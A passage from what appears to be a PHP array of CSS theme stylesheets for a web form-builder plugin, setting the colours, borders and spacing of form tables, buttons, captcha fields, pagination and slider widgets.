!important;\nheight:19px !important;\nfont-size:12px !important;\nborder: 2px inset !important;\n}\n.wdform_input input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\npadding:0px !important;\nmargin:0px !important;\nheight:16px !important;\nborder: 2px inset !important;\n}\n.time_box\n{\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nborder: 2px inset !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#7EF2FF !important;\nfont-weight: bold !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#7EF2FF !important;\n}\n.label\n{\nborder:none !important;\ncolor:#7EF2FF !important;\nfont-weight:bolder !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nheight: 20px !important;\nmargin:0 !important;\npadding:0\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder: 2px inset !important;\nmargin: 0px !important;\npadding: 0px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nmargin: 0px !important;\npadding: 0px !important;\nborder-radius:0px !important;\nheight:16px ;\nborder: 2px inset !important;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#7EF2FF !important;\n}    \n.page_deactive\n{\ncolor:black !important;\nborder: 1px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#DBDBDB !important;\n}\n.page_active\n{\ncolor:white !important;\nborder: 1px solid white !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#100F0D !important;\nbox-shadow: 0px 0px 3px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#81F2FD !important;\nborder-radius:30px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\npadding:3px !important;\nborder:1px solid black !important;\nwidth:100% !important;\nbackground-color:#2D2C28 !important;\nborder-radius:2px !important;\ntext-align: left !important; \n}\n.page_numbers\n{\nfont-size:11px !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#100F0D !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#100F0D !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#100F0D !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\nbutton.wdform_page_button\n{\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#100F0D !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\ncursor:pointer !important;\n}\nspan.wdform_page_button\n{\ncolor:#000 !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\npadding-left: 35px !important;\nmargin-right: -16px !important;\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#fff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading .grading_div\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\nmargin:0 0 3px;\r\npadding:0 4px;\r\n}\r\n\r\n.wdform_grading input:focus\r\n{\r\nborder:2px inset;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#FFFFFF !important;\r\nborder-radius:0px !important;\r\noutline:none;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range{\r\nbackground:#FFFFFF;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #999;\r\nborder-radius:0px !important;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#FFFFFF;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#3DAEF2;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #999;\r\nmargin-right:3px !important;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #999;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\nbackground:none;\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n\r\n}\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input\r\n{\r\ncolor:#000000;\r\nbackground-color:#FFFFFF;\r\nborder:none;\r\nmargin:5px 7px;\r\n}\r\n\r\n.wdform_paypal_total\r\n{\r\ncolor:#ffffff;\r\n}",
      "32" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table{\n	width:initial !important;\n	text-align:left;\n}\n.wdform_table2 td{\n	vertical-align:top !important;\n        text-align:left;\n}\n.wdform_table1 td{\n	border:inherit !important;\n	padding:inherit !important;\n	text-align:left;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		color:#000;\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:0px !important;\n		padding-bottom:0px !important;\n		padding-left:inherit;\n		padding-right:inherit;\n		display: inline !important;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n	font-size:inherit !important; \n	height:inherit !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n	background-image:none !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#ffffff !important;\nborder:0px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth:100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n//display: table !important;\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 6px !important;\nborder-collapse:separate !important;\nwidth: 700px !important;\n}\n.wdform_tbody2>tr\n{\n}\n.toolbar_padding\n{\nbackground-color:#3DAEF2 !important;\ntext-align:left !important;\npadding:6px !important;\n}\n.wdform_table2>tbody>tr>td\n{\nbackground-color:#3D8AB8 !important;\ntext-align:center;\npadding:6px !important;\nwidth:20% !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nbackground-color:#ffffff !important;\nwidth:100% !important;\n}\n.wdform_select\n{\nborder-radius:0px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\nborder: 2px inset !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:19px !important;\nfont-size:12px !important;\nborder: 2px inset !important;\n}\n.wdform_input input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\npadding:0px !important;\nmargin:0px !important;\nheight:16px !important;\nborder: 2px inset !important;\n}\n.time_box\n{\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nborder: 2px inset !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#fff !important;\nfont-weight: bold !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#fff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#fff !important;\nfont-weight:bolder !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nheight: 20px !important;\nmargin:0 !important;\npadding:0\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder: 2px inset !important;\nmargin: 0px !important;\npadding: 0px !important;\nborder-radius:0px !important;\nheight:16px ;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nmargin: 0px !important;\npadding: 0px !important;\nborder-radius:0px !important;\nheight:16px;\nborder: 2px inset !important;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#fff !important;\n}    \n.page_deactive\n{\ncolor:black !important;\nborder: 1px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#DBDBDB !important;\n}\n.page_active\n{\ncolor:white !important;\nborder: 1px solid white !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#3E95CB !important;\nbox-shadow: 0px 0px 3px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#fff !important;\nborder-radius:30px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\npadding:3px !important;\nborder:1px solid black !important;\nwidth:100% !important;\nbackground-color:#3DAEF2 !important;\nborder-radius:2px !important;\ntext-align: left !important; \n}\n.page_numbers\n{\nfont-size:11px !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#3E95CB !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#3E95CB !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#3E95CB !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\nbutton.wdform_page_button\n{\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#3E95CB !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\ncursor:pointer !important;\n}\nspan.wdform_page_button\n{\ncolor:#3E95CB !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\npadding-left: 35px !important;\nmargin-right: -16px !important;\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#000 !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\nfont-weight:bold;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\nmargin:0 0 3px;\r\npadding:0 4px;\r\n}\r\n\r\n.wdform_grading label\r\n{\r\nfont-weight:bold;\r\n}\r\n\r\n.wdform_grading input:focus\r\n{\r\nborder:2px inset;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#FFFFFF !important;\r\nborder:1px solid #999;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range{\r\nbackground:#FFFFFF;\r\nborder:1px solid #999;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #999;\r\nborder-radius:0px !important;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#FFFFFF;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#FFC486;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #999;\r\nmargin-right:3px !important;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #999;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\n\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#000000;\r\nfont-weight:bold;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n}\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input\r\n{\r\ncolor:#000000;\r\nbackground-color:#FFFFFF;\r\nmargin:5px 7px;\r\nborder:1px solid #ABADB3;\r\n}",
      "33" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table{\n	width:initial !important;\n	text-align:left;\n}\n.wdform_table2 td{\n	vertical-align:top !important;\n        text-align:left;\n}\n.wdform_table1 td{\n	border:inherit !important;\n	padding:inherit !important;\n	text-align:left;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		color:#000;\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:0px !important;\n		padding-bottom:0px !important;\n		padding-left:inherit;\n		padding-right:inherit;\n		display: inline !important;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n	font-size:inherit !important; \n	height:inherit !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n	background-image:none !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#ffffff !important;\nborder:0px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth:100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n//display: table !important;\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 6px !important;\nborder-collapse:separate !important;\nwidth: 700px !important;\n}\n.wdform_tbody2>tr\n{\n}\n.toolbar_padding\n{\nbackground-color:#FCA64F !important;\ntext-align:left !important;\npadding:6px !important;\n}\n.wdform_table2>tbody>tr>td\n{\nbackground-color:#F24004;\ntext-align:center;\npadding:6px !important;\nwidth:20% !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nbackground-color:#ffffff !important;\nwidth:100% !important;\n}\n.wdform_select\n{\nborder-radius:0px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\nborder: 2px inset !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:19px !important;\nfont-size:12px !important;\nborder: 2px inset !important;\n}\n.wdform_input input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\npadding:0px !important;\nmargin:0px !important;\nheight:16px !important;\nborder: 2px inset !important;\n}\n.time_box\n{\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nborder: 2px inset !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#fff !important;\nfont-weight: bold !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#fff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#fff !important;\nfont-weight:bolder !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nheight: 20px !important;\nmargin:0 !important;\npadding:0\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder: 2px inset !important;\nmargin: 0px !important;\npadding: 0px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nmargin: 0px !important;\npadding: 0px !important;\nborder-radius:0px !important;\nheight:16px;\nborder: 2px inset !important;\n}\n.required\n{\nborder:none !important;\ncolor:blue\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#fff !important;\n}    \n.page_deactive\n{\ncolor:black !important;\nborder: 1px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#DBDBDB !important;\n}\n.page_active\n{\ncolor:white !important;\nborder: 1px solid white !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#F5611C !important;\nbox-shadow: 0px 0px 3px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#000 !important;\nborder-radius:30px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\npadding:3px !important;\nborder:1px solid black !important;\nwidth:100% !important;\nbackground-color:#FCA64F !important;\nborder-radius:2px !important;\ntext-align: left !important; \n}\n.page_numbers\n{\nfont-size:11px !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#F5611C !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#F5611C !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#F5611C !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\nbutton.wdform_page_button\n{\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#F5611C !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\ncursor:pointer !important;\n}\nspan.wdform_page_button\n{\ncolor:#F24004 !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\npadding-left: 35px !important;\nmargin-right: -16px !important;\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#000 !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\npadding:0 4px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\nfont-weight:bold;\r\n}\r\n\r\n\r\n.wdform_grading input\r\n{\r\nmargin:0 0 3px;\r\n}\r\n\r\n.wdform_grading label,.grading_div\r\n{\r\nfont-weight:bold;\r\n}\r\n\r\n.wdform_grading input:focus\r\n{\r\nborder:2px inset;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#E6E6E6!important;\r\nborder:1px solid #999;\r\nborder-radius:0px !important;\r\noutline:none;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range{\r\nbackground:#E6E6E6;\r\nborder:1px solid #999;\r\nborder-radius:0px !important;\r\n}\r\n\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #999;\r\nborder-radius:0px !important;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#FFFFFF;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#FE5E5E;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#000000;\r\nfont-weight:bold;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #999;\r\nmargin-right:3px !important;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #999;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\n\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#000000;\r\nfont-weight:bold;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n}\r\n\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input\r\n{\r\ncolor:#000000;\r\nbackground-color:#FFFFFF;\r\nborder:1px solid #ABADB3;\r\nmargin:5px 7px;\r\n}",
      "34" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1, .wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n	line-height:1 !important;\n	border-collapse:separate !important;\n	padding-right:inherit;\n	padding-left:inherit;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1{\n	border-bottom:none;\n}\n.wdform_table1 table{\n	background-color:initial;\n}\nwdform_table2, .wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table2 table{\n	border-width:inherit !important;\n}\ntable.wdform_table1, .wdform_table1 table{\n	border:0px !important;\n}\n.wdform_table2 td{\n	text-align:left;\n	border-width:inherit !important;\n}\n.wdform_table1 table, .wdform_table1 tbody{\n	border-collapse:separate !important;\n}\n.wdform_table1 td{\n	text-align:left;\n	border-collapse:separate !important;\n	line-height:1 !important;\n	border:0px none !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	vertical-align:top !important;\n}\n.wdform_table1 span{\n	vertical-align:top 